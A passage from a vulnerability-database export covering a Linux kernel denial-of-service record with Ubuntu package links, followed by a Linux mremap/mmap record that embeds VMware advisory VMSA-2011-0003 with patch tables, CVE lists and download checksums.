        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-18-lpiacompat_2.6.24-18.32_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-kernel-source_96.43.05+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-xen_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/fglrx-amdcccle_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/xorg-driver-fglrx-dev_7.1.0-8-3+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24_2.6.24-18.26.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-server_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-xen_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-lpia_2.6.24.13-18.41_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-rt_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-powerpc-di_2.6.24-18.26_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-powerpc64-smp_2.6.24-18.26_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-legacy-kernel-source_71.86.04+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-lpia-di_2.6.24-18.16_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-server_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-lpia_2.6.24-18.32_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-lpia_2.6.24-18.16_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-powerpc_2.6.24-18.26_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-386_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-xen_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-openvz_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-server_2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24_2.6.24-18.26.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "db": "BID",
        "id": "27555"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "PACKETSTORM",
        "id": "65965"
      },
      {
        "db": "PACKETSTORM",
        "id": "67518"
      },
      {
        "db": "PACKETSTORM",
        "id": "66960"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "db": "BID",
        "id": "27555"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "PACKETSTORM",
        "id": "65965"
      },
      {
        "db": "PACKETSTORM",
        "id": "67518"
      },
      {
        "db": "PACKETSTORM",
        "id": "66960"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-01-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "date": "2008-01-31T00:00:00",
        "db": "BID",
        "id": "27555"
      },
      {
        "date": "2008-02-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "date": "2008-05-01T22:34:19",
        "db": "PACKETSTORM",
        "id": "65965"
      },
      {
        "date": "2008-06-20T19:14:41",
        "db": "PACKETSTORM",
        "id": "67518"
      },
      {
        "date": "2008-06-04T00:42:46",
        "db": "PACKETSTORM",
        "id": "66960"
      },
      {
        "date": "2008-01-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "date": "2008-01-29T20:00:00",
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "date": "2008-09-08T19:31:00",
        "db": "BID",
        "id": "27555"
      },
      {
        "date": "2008-12-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "date": "2008-01-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "date": "2018-10-03T21:52:43.213000",
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  chrp_show_cpuinfo() Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      }
    ],
    "trust": 0.6
  }
}

var-201001-0654
Vulnerability from variot

The Linux kernel before 2.6.32.4 allows local users to gain privileges or cause a denial of service (panic) by calling the (1) mmap or (2) mremap function, aka the "do_mremap() mess" or "mremap/mmap mess.". The Linux kernel is prone to multiple denial-of-service vulnerabilities when mapping memory addresses. Local attackers may leverage these issues to crash the kernel and deny service to legitimate users. Other attacks may also be possible. These issues have been resolved in the 2.6.32.4 kernel. Linux Kernel is the kernel used by the open source operating system Linux. There is a permissions vulnerability in the Linux kernel. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2011-0003 Synopsis: Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX Issue date: 2011-02-10 Updated on: 2011-02-10 (initial release of advisory) CVE numbers: --- Apache Tomcat --- CVE-2009-2693 CVE-2009-2901 CVE-2009-2902 CVE-2009-3548 CVE-2010-2227 CVE-2010-1157 --- Apache Tomcat Manager --- CVE-2010-2928 --- cURL --- CVE-2010-0734 --- COS Kernel --- CVE-2010-1084 CVE-2010-2066 CVE-2010-2070 CVE-2010-2226 CVE-2010-2248 CVE-2010-2521 CVE-2010-2524 CVE-2010-0008 CVE-2010-0415 CVE-2010-0437 CVE-2009-4308 CVE-2010-0003 CVE-2010-0007 CVE-2010-0307 CVE-2010-1086 CVE-2010-0410 CVE-2010-0730 CVE-2010-1085 CVE-2010-0291 CVE-2010-0622 CVE-2010-1087 CVE-2010-1173 CVE-2010-1437 CVE-2010-1088 CVE-2010-1187 CVE-2010-1436 CVE-2010-1641 CVE-2010-3081 --- Microsoft SQL Express --- CVE-2008-5416 CVE-2008-0085 CVE-2008-0086 CVE-2008-0107 CVE-2008-0106 --- OpenSSL --- CVE-2010-0740 CVE-2010-0433 CVE-2010-3864 CVE-2010-2939 --- Oracle (Sun) JRE --- CVE-2009-3555 CVE-2010-0082 CVE-2010-0084 CVE-2010-0085 CVE-2010-0087 CVE-2010-0088 CVE-2010-0089 CVE-2010-0090 CVE-2010-0091 CVE-2010-0092 CVE-2010-0093 CVE-2010-0094 CVE-2010-0095 CVE-2010-0837 CVE-2010-0838 CVE-2010-0839 CVE-2010-0840 CVE-2010-0841 CVE-2010-0842 CVE-2010-0843 CVE-2010-0844 CVE-2010-0845 CVE-2010-0846 CVE-2010-0847 CVE-2010-0848 CVE-2010-0849 CVE-2010-0850 CVE-2010-0886 CVE-2010-3556 CVE-2010-3566 CVE-2010-3567 CVE-2010-3550 CVE-2010-3561 CVE-2010-3573 CVE-2010-3565 CVE-2010-3568 CVE-2010-3569 CVE-2010-1321 CVE-2010-3548 CVE-2010-3551 CVE-2010-3562 CVE-2010-3571 CVE-2010-3554 CVE-2010-3559 CVE-2010-3572 CVE-2010-3553 CVE-2010-3549 CVE-2010-3557 CVE-2010-3541 CVE-2010-3574 --- pam_krb5 --- CVE-2008-3825 CVE-2009-1384


  1. Summary

Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.

  1. Relevant releases

vCenter Server 4.1 without Update 1,

vCenter Update Manager 4.1 without Update 1,

ESXi 4.1 without patch ESXi410-201101201-SG,

ESX 4.1 without patch ESX410-201101201-SG.

  1. Problem Description

a. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3

Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.

Customers using other database solutions need not update for
these issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • Hosted products are VMware Workstation, Player, ACE, Fusion.

b. vCenter Apache Tomcat Management Application Credential Disclosure

The Apache Tomcat Manager application configuration file contains
logon credentials that can be read by unprivileged local users.

The issue is resolved by removing the Manager application in
vCenter 4.1 Update 1.

If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon
credentials are not present in the configuration file after the
update.

VMware would like to thank Claudio Criscione of Secure Networking
for reporting this issue to us.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-2928 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not affected
VirtualCenter  2.5       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21

Oracle (Sun) JRE update to version 1.6.0_21, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,
CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,
CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,
CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,
CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,
CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,
CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,
CVE-2010-0850.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following name to the security issue fixed in
Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not applicable **
VirtualCenter  2.5       Windows  not applicable **

Update Manager 4.1       Windows  not applicable **
Update Manager 4.0       Windows  not applicable **
Update Manager 1.0       Windows  not applicable **


hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not applicable **
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.5.0 family

d. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26

Oracle (Sun) JRE update to version 1.5.0_26, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,
CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,
CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,
CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,
CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,
CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,
CVE-2010-3574.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  not applicable **
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      not applicable **
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, no patch planned
ESX            3.0.3     ESX      affected, no patch planned
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.6.0 family

e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28

Apache Tomcat updated to version 6.0.28, which addresses multiple
security issues that existed in earlier releases of Apache Tomcat

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i
and CVE-2009-3548.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  not applicable **

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Apache Tomcat 5.5 family

f. vCenter Server third party component OpenSSL updated to version 0.9.8n

The version of the OpenSSL library in vCenter Server is updated to
0.9.8n.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0740 and CVE-2010-0433 to the
issues addressed in this version of OpenSSL.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESX third party component OpenSSL updated to version 0.9.8p

The version of the ESX OpenSSL library is updated to 0.9.8p.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-3864 and CVE-2010-2939 to the
issues addressed in this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable
ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Fusion.

h. ESXi third party component cURL updated

The version of cURL library in ESXi is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0734 to the issues addressed in
this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

i. ESX third party component pam_krb5 updated

The version of pam_krb5 library is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3825 and CVE-2009-1384 to the
issues addressed in the update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

j. ESX third party update for Service Console kernel

The Service Console kernel is updated to include kernel version
2.6.18-194.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,
CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,
CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,
CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,
CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,
CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,
CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and
CVE-2010-3081 to the issues addressed in the update.

Note: This update also addresses the 64-bit compatibility mode
stack pointer underflow issue identified by CVE-2010-3081. This
issue was patched in an ESX 4.1 patch prior to the release of
ESX 4.1 Update 1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware vCenter Server 4.1 Update 1 and modules


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes: http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html

File type: .iso md5sum: 729cf247aa5d33ceec431c86377eee1a sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0

File type: .zip md5sum: fd1441bef48a153f2807f6823790e2f0 sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi 4.1 Installable Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html http://kb.vmware.com/kb/1027919

File type: .iso MD5SUM: d68d6c2e040a87cd04cd18c04c22c998 SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1) File type: .zip MD5SUM: 2f1e009c046b20042fae3b7ca42a840f SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0) File type: .zip MD5SUM: 67b924618d196dafaf268a7691bd1a0f SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5) File type: .zip MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4 SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488

VMware Tools CD image for Linux Guest OSes File type: .iso MD5SUM: dad66fa8ece1dd121c302f45444daa70 SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi Installable Update 1 contains the following security bulletins: ESXi410-201101201-SG.

ESX 4.1 Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html http://kb.vmware.com/kb/1029353

ESX 4.1 Update 1 (DVD ISO) File type: .iso md5sum: b9a275b419a20c7bedf31c0bf64f504e sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1) File type: .zip md5sum: 2d81a87e994aa2b329036f11d90b4c14 sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798

Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1 File type: .zip md5sum: 75f8cebfd55d8a81deb57c27def963c2 sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0) File type: .zip md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2 sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922

VMware Tools CD image for Linux Guest OSes File type: .iso md5sum: dad66fa8ece1dd121c302f45444daa70 sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af

